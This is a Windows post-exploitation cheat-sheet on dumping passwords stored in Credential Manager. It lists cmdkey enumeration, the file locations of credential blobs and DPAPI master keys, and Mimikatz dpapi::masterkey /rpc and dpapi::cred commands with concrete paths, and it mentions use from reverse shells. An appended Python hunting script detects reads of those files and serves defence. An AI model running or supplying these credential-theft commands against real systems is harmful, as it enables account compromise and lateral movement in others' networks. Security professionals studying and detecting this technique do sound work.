Dumping Passwords from Windows Credential Manager

Credential Enumeration

cmdkey /list

In reverse shells, I have noticed that it's impossible to spawn processes using runas.exe /savecred /user:DOMAIN\username if the credential is stored in Windows Credential Manager.

That said, we may still be able to dump the password with the Mimikatz dpapi module, since these credentials are protected with DPAPI.

Common Locations for Cached Credentials

# Legacy CMD Environment Variable
"%USERPROFILE%\AppData\Local\Microsoft\Credentials"
"%USERPROFILE%\AppData\Roaming\Microsoft\Credentials"

# PowerShell Environment Variable
"$env:USERPROFILE\AppData\Local\Microsoft\Credentials"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Credentials"
ls -r -h ~\AppData\Local\Microsoft\Credentials\ | select -expand fullname
ls -r -h ~\AppData\Roaming\Microsoft\Credentials\ | select -expand fullname

Enumerate any stored credentials

Common Locations for Encryption Keys

# Legacy CMD Environment Variables
"%USERPROFILE%\AppData\Local\Microsoft\Protect"
"%USERPROFILE%\AppData\Roaming\Microsoft\Protect"

# PowerShell Environment Variables
"$env:USERPROFILE\AppData\Local\Microsoft\Protect"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Protect"
ls -r -h ~\AppData\Roaming\Microsoft\Protect\ | select -expand fullname

Enumerate any stored keys

Use Mimikatz to Unprotect DPAPI Data

Cache Master Keys

mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d /rpc
mimikatz # dpapi::cache

Make an RPC call to the domain controller to retrieve the master key when the user's password is unknown

Unprotect Cached Credentials

mimikatz # dpapi::cred /in:C:\Users\user_name\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4

Go through each cached credential file and attempt to unprotect it with the master keys cached in the previous step
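As an added example (not part of the original notes), a hunting script that flags reads of the Credential Manager blobs and DPAPI master key files at the locations above by processes that do not normally touch them. The log line format and the EXPECTED_READERS list are assumptions, and the sample lines are constructed, reusing the SID, master key GUID and blob file name shown in the mimikatz commands.

```python
import re

# File name shapes from the locations listed above: Credential Manager blobs are
# 32 hex characters; DPAPI master keys are GUID-named files under Protect\<SID>\.
CRED_BLOB = re.compile(r"\\Microsoft\\Credentials\\([0-9A-F]{32})$", re.I)
MASTER_KEY = re.compile(
    r"\\Microsoft\\Protect\\(S-1-5-21-\d+-\d+-\d+-\d+)\\"
    r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$", re.I)

# Processes that legitimately read these files (assumption; tune per environment).
EXPECTED_READERS = {"lsass.exe", "svchost.exe", "explorer.exe", "dllhost.exe"}

def classify(path):
    """Return (kind, detail) if path is a DPAPI blob or master key, else None."""
    m = CRED_BLOB.search(path)
    if m:
        return "credential_blob", m.group(1)
    m = MASTER_KEY.search(path)
    if m:
        return "master_key", f"sid={m.group(1)} guid={m.group(2)}"
    return None

def hunt(lines):
    """Flag reads of DPAPI material by processes outside EXPECTED_READERS.

    Each line is 'timestamp|user|process|path' (a constructed format, not a real
    event schema). Returns a list of (user, process, kind, detail) tuples."""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split("|", 3)
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the whole hunt
        _ts, user, process, path = parts
        hit = classify(path)
        if hit and process.lower() not in EXPECTED_READERS:
            findings.append((user, process) + hit)
    return findings

# Constructed sample log reusing the SID, master key GUID and blob name from this page.
SAMPLE = [
    r"2024-01-01T10:00:00Z|CORP\alice|explorer.exe|C:\Users\alice\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4",
    r"2024-01-01T10:05:00Z|CORP\alice|powershell.exe|C:\Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb",
    r"2024-01-01T10:05:01Z|CORP\alice|powershell.exe|C:\Users\alice\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4",
    r"2024-01-01T10:06:00Z|CORP\alice|notepad.exe|C:\Users\alice\Documents\notes.txt",
]

if __name__ == "__main__":
    for user, process, kind, detail in hunt(SAMPLE):
        print(f"ALERT {user} via {process}: {kind} {detail}")
```

The explorer.exe read is suppressed as expected activity, so only the two powershell.exe reads are reported.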

References

https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets

https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey

https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials